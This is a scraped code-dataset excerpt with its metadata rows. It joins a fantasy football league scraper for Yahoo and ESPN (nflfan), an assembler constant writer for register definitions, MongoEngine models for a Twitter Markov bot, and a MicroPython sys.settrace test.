def roster(self, week, ident):
for r in self.rosters(week):
if r.owner.ident == ident:
return r
return None
def cache_path(self, week):
return os.path.join(nflfan.config.cache_path(),
str(self.season), str(self.phase), str(week),
self.full_name + '.json')
def _cached(self, week, key):
if week not in self._cache:
self._load(week)
return self._cache[week][key]
def _load(self, week):
raw = None
fp = self.cache_path(week)
try:
with open(fp) as f:
raw = json.load(f)
except IOError:
raise IOError(
"No cached data for week %d in %s could be found at %s\n"
"Have you run `nflfan-update --week %d` yet?"
% (week, self.full_name, fp, week))
d = {'owners': [], 'matchups': [], 'rosters': []}
for owner in raw['owners']:
d['owners'].append(Owner._make(owner))
for matchup in raw['matchups']:
o1 = None if matchup[0] is None else Owner._make(matchup[0])
o2 = None if matchup[1] is None else Owner._make(matchup[1])
d['matchups'].append(Matchup(o1, o2))
for roster in raw['rosters']:
o = Owner._make(roster[0])
r = Roster(o, roster[1], roster[2], [])
for rp in roster[3]:
r.players.append(RosterPlayer._make(rp))
d['rosters'].append(r)
self._cache[week] = d
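    # The cached JSON consumed by _load is expected to look roughly like
    # (a sketch inferred from the parsing above, not a formal schema):
    #   {"owners":   [[ident, name], ...],
    #    "matchups": [[[ident, name], [ident, name]], ...],
    #    "rosters":  [[[ident, name], season, week, [[<RosterPlayer fields>], ...]], ...]}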
def __str__(self):
return self.full_name
class Matchup (namedtuple('Matchup', 'owner1 owner2')):
__pdoc__['Matchup.owner1'] = \
"""
One of the two teams in this matchup represented as an
`nflfan.Owner` object.
"""
__pdoc__['Matchup.owner2'] = \
"""
One of the two teams in this matchup represented as an
`nflfan.Owner` object.
"""
def other(self, ident):
"""
Given an identifier for one of the owner's in this matchup,
return the `nflfan.Owner` of the other owner.
"""
assert ident in (self.owner1.ident, self.owner2.ident)
if ident == self.owner1.ident:
return self.owner2
else:
return self.owner1
def __str__(self):
return '%s vs. %s' % (self.owner1, self.owner2)
class Owner (namedtuple('Owner', 'ident name')):
__pdoc__['Owner.ident'] = \
"""
A unique identifier corresponding to this owner. The type
of this value is provider-dependent.
"""
__pdoc__['Owner.name'] = \
"""A string representing the name of this owner."""
def __str__(self):
return self.name
class Roster (namedtuple('Roster', 'owner season week players')):
__pdoc__['Roster.owner'] = \
"""
A `nflfan.Owner` object corresponding to the owner of this
roster.
"""
__pdoc__['Roster.players'] = \
"""
A list of `nflfan.RosterPlayer` objects corresponding to the
set of players on this roster.
"""
def new_player(self, pos, team, bench, player_id):
"""
A convenience method for creating a new `nflfan.RosterPlayer`
given the current roster.
"""
return RosterPlayer(pos, team, bench, self.season, self.week,
None, 0.0, None, player_id)
@property
def active(self):
return filter(lambda rp: not rp.bench, self.players)
@property
def benched(self):
return filter(lambda rp: rp.bench, self.players)
@property
def points(self):
"""Returns the total number of points for non-benched players."""
return sum(p.points for p in self.players if not p.bench)
def __str__(self):
s = []
for rp in self.players:
s.append(str(rp))
return '\n'.join(s)
class RosterPlayer (
namedtuple('RosterPlayer',
'position team bench season week '
'game points player player_id')):
__pdoc__['RosterPlayer.position'] = \
"""
A string corresponding to the position of the roster spot
occupied by this player. The possible values of this string are
provider dependent.
"""
__pdoc__['RosterPlayer.team'] = \
"""
    The abbreviation of the team this player belongs to. It must be a
valid nfldb team abbreviation and *cannot* be `UNK`.
"""
__pdoc__['RosterPlayer.bench'] = \
"""A boolean indicating whether this is a bench position or not."""
__pdoc__['RosterPlayer.season'] = \
"""The year of the corresponding NFL season."""
__pdoc__['RosterPlayer.week'] = \
"""The week number in which this roster was set."""
__pdoc__['RosterPlayer.game'] = \
"""
The `nfldb.Game` object for the game that this player played
in. If this roster position corresponds to a bye week, then
this attribute is set to `None`.
"""
__pdoc__['RosterPlayer.points'] = \
"""The total fantasy points for this roster player."""
__pdoc__['RosterPlayer.player'] = \
"""
A `nfldb.Player` object corresponding to this roster player.
This attribute is `None` by default, and is always `None` for
roster players corresponding to entire teams (e.g., defense).
"""
__pdoc__['RosterPlayer.player_id'] = \
"""
A player id string corresponding to the player in this roster
position and a player in nfldb. This may be `None` when the
    roster player corresponds to an entire team (e.g., a defense).
"""
@property
def is_empty(self):
return self.team is None and self.player_id is None
@property
def is_defense(self):
return self.team is not None and self.player_id is None
@property
def is_player(self):
return self.player_id is not None
@property
def id(self):
if self.is_empty:
return 'Empty'
elif self.is_defense:
return self.team
else:
return self.player_id
@property
def name(self):
return self.id if not self.player else self.player.full_name
def __str__(self):
if self.game is not None and self.game.is_playing:
playing = '*'
else:
playing = ' '
return '%-6s %-4s %-20s %s%0.2f' \
% (self.position, self.team, self.name, playing, self.points)
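# Editor's note: illustration only, not part of the original source. With the
# format string above, a single roster line renders roughly as:
#
#   QB     NE   Tom Brady            *24.50
#
# where '*' marks a player whose game is currently in progress.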
class Provider (object):
"""
This class describes the interface that each fantasy football
provider must implement so that it can work with nflfan. In other
words, this is an abstract base class that should **not** be
instantiated directly.
All public members of this class must also be defined in each
provider implementation, including the class variables.
"""
provider_name = None
"""The name of the provider used in the configuration file."""
conf_required = ['scoring', 'league_name', 'season', 'phase', 'league_id']
"""A list of fields required for every provider."""
conf_optional = ['me']
"""A list of fields that are optional for every provider."""
def __init__(self, lg):
self._lg = lg
self._session = requests.Session()
self._session.headers.update(getattr(self, '_headers', {}))
def owners(self):
"""Returns a list of `nflfan.Owner` objects."""
assert False, 'subclass responsibility'
def matchups(self, week):
"""
Given a week number, this returns a list of `nflfan.Matchup`
objects describing the head-to-head matchups for `week`.
"""
assert False, 'subclass responsibility'
def roster(self, player_search, owner, week):
"""
Given a `nflfan.Owner` and a week number, this returns a
`nflfan.Roster` object. The `nflfan.Roster` contains a list of
`nfldb.Player` objects and their corresponding position on the
roster.
`player_search` should be a function that takes a full
player name and returns the closest matching player as a
`nfldb.Player` object. It should also optionally take keyword
arguments `team` and `position` that allow for extra filtering.
Note that the roster position is a string but the set of
possible values is provider dependent. It is used for display
purposes only.
"""
assert False, 'subclass responsibility'
def save(self, fp, player_search, week):
"""
Writes a JSON encoding of all the owners, matchups and rosters
for the given week to a file at `fp`.
`player_search` should be a function that takes a full
player name and returns the closest matching player as a
`nfldb.Player` object. It should also optionally take keyword
arguments `team` and `position` that allow for extra filtering.
"""
d = {
'owners': self.owners(),
'matchups': self.matchups(week),
}
# I'm hoping this doesn't hurt custom providers that don't need
# to do IO to fetch a roster.
def roster(owner):
return self.roster(player_search, owner, week)
# pool = multiprocessing.pool.ThreadPool(3)
# d['rosters'] = pool.map(roster, d['owners'])
d['rosters'] = map(roster, d['owners'])
try:
os.makedirs(os.path.dirname(fp))
except OSError:
pass
json.dump(d, open(fp, 'w+'))
def _request(self, url):
eprint('download %s' % url)
r = self._session.get(url)
soup = BeautifulSoup(r.text, 'html.parser')
if self._login_form(soup):
self._login()
r = self._session.get(url)
soup = BeautifulSoup(r.text, 'html.parser')
if self._login_form(soup):
raise IOError("Authentication failure.")
return r
def _login(self):
assert self._login_url is not None
soup = BeautifulSoup(self._session.get(self._login_url).text,
'html.parser')
if not self._login_form(soup):
# Already logged in!
return
form = self._login_form(soup)
params = self._login_params(soup)
for inp in soup.select('#hiddens input[type="hidden"]'):
params[inp['name']] = inp['value']
r = self._session.post('https://login.yahoo.com' + form['action'],
params=params)
return BeautifulSoup(r.text, 'html.parser')
def _login_params(self):
assert False, 'subclass responsibility'
def _login_form(self, soup):
assert False, 'subclass responsibility'
def __str__(self):
return self.__class__.provider_name
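# Editor's note: the class below is a hypothetical, minimal sketch added for
# illustration; it is not part of the original nflfan source. It only shows
# the shape of the Provider interface described above -- its owners, matchups
# and rosters are hard-coded.
class StaticExampleProvider (Provider):
    provider_name = 'static-example'
    conf_required = []
    conf_optional = []
    def owners(self):
        return [Owner('1', 'Team Alpha'), Owner('2', 'Team Beta')]
    def matchups(self, week):
        o1, o2 = self.owners()
        return [Matchup(o1, o2)]
    def roster(self, player_search, owner, week):
        # A real provider would fetch data here and use `player_search` to
        # resolve player names to nfldb player ids.
        return Roster(owner, self._lg.season, week, [])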
class Yahoo (Provider):
provider_name = 'yahoo'
conf_required = []
conf_optional = ['username', 'password']
_headers = {'User-Agent': _user_agent}
_login_url = 'https://login.yahoo.com/config/login'
def __init__(self, lg):
super(Yahoo, self).__init__(lg)
_, _, self._league_num = self._lg.ident.split('.')
def owners(self):
match_owner_link = re.compile('team-[0-9]+-name')
url = _urls['yahoo']['owner'] % self._league_num
soup = BeautifulSoup(self._request(url).text, 'html.parser')
owners = []
for link in soup.find_all(id=match_owner_link):
ident = self._owner_id_from_url(link['href'])
owners.append(Owner(ident, link.text.strip()))
return owners
def matchups(self, week):
mk_owner = lambda div: Owner(owner_id(div.a['href']), div.text.strip())
owner_id = self._owner_id_from_url
url = _urls['yahoo']['matchup'] % (self._league_num, week)
rjson = self._request(url).json()
soup = BeautifulSoup(rjson['content'], 'html.parser')
matchups = []
for matchup in soup.find('ul').children:
pair = list(matchup.find_all('div', class_='Fz-sm'))
if len(pair) == 1:
matchups.append(Matchup(mk_owner(pair[0]), None))
else:
matchups.append(Matchup(mk_owner(pair[0]), mk_owner(pair[1])))
return matchups
def roster(self, player_search, owner, week):
def to_pos(row):
return row.td.find(class_='pos-label')['data-pos'].strip().upper()
def to_name(row):
return row.find(class_='ysf-player-name').a.text.strip()
def to_team(row):
team_pos = row.find(class_='ysf-player-name').span.text.strip()
return nfldb.standard_team(re.search('^\S+', team_pos).group(0))
def rplayer(r, name, team, pos):
bench = pos == 'BN'
if name is None and team is None:
return r.new_player(pos, None, bench, None)
elif nfldb.standard_team(name) != 'UNK':
return r.new_player(pos, team, bench, None)
else:
player = player_search(name, team=team, position=pos)
return r.new_player(pos, team, bench, player.player_id)
match_table_id = re.compile('^statTable[0-9]+$')
url = _urls['yahoo']['roster'] % (self._league_num, owner.ident, week)
soup = BeautifulSoup(self._request(url).text, 'html.parser')
roster = Roster(owner, self._lg.season, week, [])
for table in soup.find_all(id=match_table_id):
for row in table.tbody.find_all('tr', recursive=False):
pos = to_pos(row)
try:
team, name = to_team(row), to_name(row)
roster.players.append(rplayer(roster, name, team, pos))
except AttributeError:
roster.players.append(rplayer(roster, None, None, pos))
return roster
def _owner_id_from_url(self, url):
return re.search('%s/([0-9]+)' % self._league_num, url).group(1)
def _login(self):
soup = super(Yahoo, self)._login()
if self._login_form(soup):
err_div = soup.find(id='mbr-login-error')
err_msg = 'Unknown error.'
if err_div:
err_msg = err_div.text.strip()
raise IOError('Login failed: %s' % err_msg)
def _login_params(self, soup):
return {
'username': self._lg.conf.get('username', ''),
'passwd': self._lg.conf.get('password', ''),
'signin': '',
# '.persistent': 'y',
'countrycode': '1',
# '_crumb': '8cSELfo475z',
# '_ts': str(int(time.time())),
# '_format': '',
# '_uuid': 'Q9JF85iYg9ax',
# '_seqid': '2',
# 'otp_channel': '',
}
def _login_form(self, soup):
return soup.find('form', id='mbr-login-form')
class ESPN (Provider):
provider_name = 'espn'
conf_required = []
conf_optional = ['username', 'password']
_headers = {'User-Agent': _user_agent}
_login_url = 'http://games.espn.go.com/ffl/signin?_=_'
def owners(self):
url = _urls['espn']['owner'].format(
league_id=self._lg.ident, season_id=self._lg.season)
soup = BeautifulSoup(self._request(url).text, 'html.parser')
owners = []
for td in soup.select('tr.ownerRow td.teamName'):
ident = self._owner_id_from_url(td.a['href'])
owners.append(Owner(ident, td.text.strip()))
return owners
def matchups(self, week):
owner_id = self._owner_id_from_url
url = _urls['espn']['matchup'].format(
league_id=self._lg.ident, season_id=self._lg.season, week=week)
soup = BeautifulSoup(self._request(url).text, 'html.parser')
matchupDiv = soup.find(id='scoreboardMatchups')
matchups = []
for table in matchupDiv.select('table.matchup'):
t1, t2 = list(table.find_all(class_='name'))
id1, id2 = owner_id(t1.a['href']), owner_id(t2.a['href'])
name1, name2 = t1.a.text.strip(), t2.a.text.strip()
o1, o2 = Owner(id1, name1), Owner(id2, name2)
matchups.append(Matchup(o1, o2))
return matchups
def roster(self, player_search, owner, week):
def to_pos(row):
pos = row.find(class_='playerSlot').text.strip().upper()
if pos == 'BENCH':
return 'BN'
return pos
def to_name(row):
name = row.find(class_='playertablePlayerName').a.text.strip()
# If this is the defense, apparently 'D/ST' is included in
# the name. Wtf?
return re.sub('\s+D/ST$', '', name)
def to_team(row):
tpos = row.find(class_='playertablePlayerName').a.next_sibling
tpos = tpos.strip(' \r\n\t*,|').upper()
# This is a little weird because the team name seems to run
# in with the position. Perhaps a weird encoding quirk?
if len(tpos) < 2:
return 'UNK'
elif len(tpos) == 2:
return nfldb.standard_team(tpos)
else:
team = nfldb.standard_team(tpos[0:3])
if team == 'UNK':
team = nfldb.standard_team(tpos[0:2])
return team
def rplayer(r, name, team, pos):
bench = pos == 'BN'
name_team = nfldb.standard_team(name)
if name is None and team is None:
return r.new_player(pos, None, bench, None)
elif name_team != 'UNK':
return r.new_player(pos, name_team, bench, None)
else:
player = player_search(name, team=team, position=pos)
return r.new_player(pos, team, bench, player.player_id)
url = _urls['espn']['roster'].format(
league_id=self._lg.ident, season_id=self._lg.season, week=week,
team_id=owner.ident)
soup = BeautifulSoup(self._request(url).text, 'html.parser')
roster = Roster(owner, self._lg.season, week, [])
for tr in soup.select('tr.pncPlayerRow'):
if tr.get('id', '') == 'pncEmptyRow':
continue
pos = to_pos(tr)
try:
team, name = to_team(tr), to_name(tr)
roster.players.append(rplayer(roster, name, team, pos))
except AttributeError:
roster.players.append(rplayer(roster, None, None, pos))
return roster
def _owner_id_from_url(self, url):
return re.search('teamId=([0-9]+)', url).group(1)
def _login(self):
soup = super(ESPN, self)._login()
if self._login_form(soup):
err_msg = []
for msg in soup.find_all('font', color='#ff0000'):
err_msg.append(msg.text.strip())
err_msg = '\n'.join(err_msg) if err_msg else 'Unknown error.'
raise IOError('Login failed: %s' % err_msg)
def _login_params(self):
return {
'username': self._lg.conf.get('username', ''),
'password': self._lg.conf.get('password', ''),
'submit': 'Sign In',
}
def _login_form(self, soup):
return soup.find('form', attrs={'name': 'loginForm'})
| unlicense | 1,224,262,221,576,702,000 | 33.188889 | 121 | 0.56252 | false | 3.717306 | false | false | false |
dallingham/regenerate | regenerate/writers/asm_equ.py | 1 | 2211 | #
# Manage registers in a hardware design
#
# Copyright (C) 2008 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
AsmEqu - Writes out assembler defines (based on the GNU assembler)
"""
from regenerate.writers.writer_base import WriterBase, ExportInfo
class AsmEqu(WriterBase):
"""
Output file creation class that writes a set of constants representing
    the tokens for the register addresses.
"""
def __init__(self, dbase):
WriterBase.__init__(self, dbase)
self._offset = 0
self._ofile = None
def write_def(self, reg, prefix, offset):
"""
Writes the definition in the format of:
.equ register, address
"""
address = reg.address
base = reg.token
name = "%s%s, " % (prefix, base)
self._ofile.write("\t.equ %-30s 0x%s\n" % (name, address + offset))
def write(self, filename):
"""
Writes the output file
"""
self._ofile = open(filename, "w")
self._write_header_comment(self._ofile, 'site_asm.inc',
comment_char=';; ')
for reg_key in self._dbase.get_keys():
self.write_def(self._dbase.get_register(reg_key), self._prefix,
self._offset)
self._ofile.write('\n')
self._ofile.close()
EXPORTERS = [
(WriterBase.TYPE_BLOCK, ExportInfo(AsmEqu, ("Header files", "Assembler Source"),
"Assembler files", ".s", 'headers-asm'))
]
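# Editor's note: illustration only, not part of the original file. With a
# prefix of "SITE_" and a register whose token is "CTRL", write_def() emits a
# line of roughly this shape (the name field is left-justified to 30 columns):
#
#   .equ SITE_CTRL,                       0x<address>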
| gpl-2.0 | -8,399,737,680,129,126,000 | 33.015385 | 84 | 0.6237 | false | 3.962366 | false | false | false |
publicscience/brain | app/models.py | 1 | 2321 | import datetime
from app import db
class Tweet(db.Document):
created_at = db.DateTimeField(default=datetime.datetime.now, required=True)
tid = db.IntField(required=True, unique=True)
body = db.StringField(required=True, unique=True)
username = db.StringField(required=True, max_length=50)
meta = {
'allow_inheritance': True,
'indexes': ['-created_at', 'username'],
'ordering': ['-created_at']
}
class Muse(db.Document):
"""
A muse is a Twitter user
    that the Brain learns from.
"""
created_at = db.DateTimeField(default=datetime.datetime.now, required=True)
username = db.StringField(required=True, unique=True, max_length=50)
negative = db.BooleanField(default=False)
meta = {
'allow_inheritance': True,
'indexes': ['-created_at', 'username'],
'ordering': ['-created_at']
}
class Config(db.Document):
"""
Configuration for the Brain.
If you make changes to this model,
you will need to drop the saved record
in the database.
$ mongo
> show dbs
> use <your db>
> db.config.drop()
Then restart the application.
"""
# Retweet probability threshold.
# The higher this is, the less the brain will retweet.
retweet_threshold = db.FloatField(required=True, default=0.9)
# Chance to act. Probability the brain will tweet.
# The lower this is, the less the brain will tweet.
chance_to_act = db.FloatField(required=True, default=0.05)
    # Maximum number of retweets in an interval.
# Cause sometimes it accidentally retweets a TON of stuff.
max_retweets = db.IntField(required=True, default=10)
# Some brain configuration.
ngram_size = db.IntField(required=True, default=1)
ramble = db.BooleanField(default=True)
spasm = db.FloatField(required=True, default=0.05)
meta = {
'max_documents': 1
}
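# Editor's note: a hedged example added for illustration; it is not part of
# the original app. The collection is capped at a single document, so callers
# presumably fetch that one record or create it on first run -- something
# like this hypothetical helper:
def _example_get_config():
    config = Config.objects.first()
    if config is None:
        config = Config()
        config.save()
    return config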
class Doc(db.Document):
"""
A manually-fed training document for the Markov generator.
"""
created_at = db.DateTimeField(default=datetime.datetime.now, required=True)
body = db.StringField(required=True, unique=True)
meta = {
'allow_inheritance': True,
'indexes': ['-created_at'],
'ordering': ['-created_at']
}
| mit | 7,952,930,502,741,536,000 | 28.379747 | 79 | 0.637656 | false | 3.767857 | false | false | false |
kerneltask/micropython | tests/misc/sys_settrace_features.py | 7 | 2491 | import sys
try:
sys.settrace
except AttributeError:
print("SKIP")
raise SystemExit
def print_stacktrace(frame, level=0):
# Ignore CPython specific helpers.
if frame.f_globals["__name__"].find("importlib") != -1:
print_stacktrace(frame.f_back, level)
return
print(
"%2d: %s@%s:%s => %s:%d"
% (
level,
" ",
frame.f_globals["__name__"],
frame.f_code.co_name,
# reduce full path to some pseudo-relative
"misc" + "".join(frame.f_code.co_filename.split("tests/misc")[-1:]),
frame.f_lineno,
)
)
if frame.f_back:
print_stacktrace(frame.f_back, level + 1)
class _Prof:
trace_count = 0
def trace_tick(self, frame, event, arg):
self.trace_count += 1
print_stacktrace(frame)
__prof__ = _Prof()
alice_handler_set = False
def trace_tick_handler_alice(frame, event, arg):
print("### trace_handler::Alice event:", event)
__prof__.trace_tick(frame, event, arg)
return trace_tick_handler_alice
bob_handler_set = False
def trace_tick_handler_bob(frame, event, arg):
print("### trace_handler::Bob event:", event)
__prof__.trace_tick(frame, event, arg)
return trace_tick_handler_bob
def trace_tick_handler(frame, event, arg):
# Ignore CPython specific helpers.
if frame.f_globals["__name__"].find("importlib") != -1:
return
print("### trace_handler::main event:", event)
__prof__.trace_tick(frame, event, arg)
if frame.f_code.co_name != "factorial":
return trace_tick_handler
global alice_handler_set
if event == "call" and not alice_handler_set:
alice_handler_set = True
return trace_tick_handler_alice
global bob_handler_set
if event == "call" and not bob_handler_set:
bob_handler_set = True
return trace_tick_handler_bob
return trace_tick_handler
def factorial(n):
if n == 0:
return 1
else:
return n * factorial(n - 1)
def do_tests():
# These commands are here to demonstrate some execution being traced.
print("Who loves the sun?")
print("Not every-", factorial(3))
from sys_settrace_subdir import trace_generic
trace_generic.run_tests()
return
sys.settrace(trace_tick_handler)
do_tests()
sys.settrace(None)
print("\n------------------ script exited ------------------")
print("Total traces executed: ", __prof__.trace_count)
| mit | 3,555,715,638,384,300,500 | 22.064815 | 80 | 0.596146 | false | 3.558571 | false | false | false |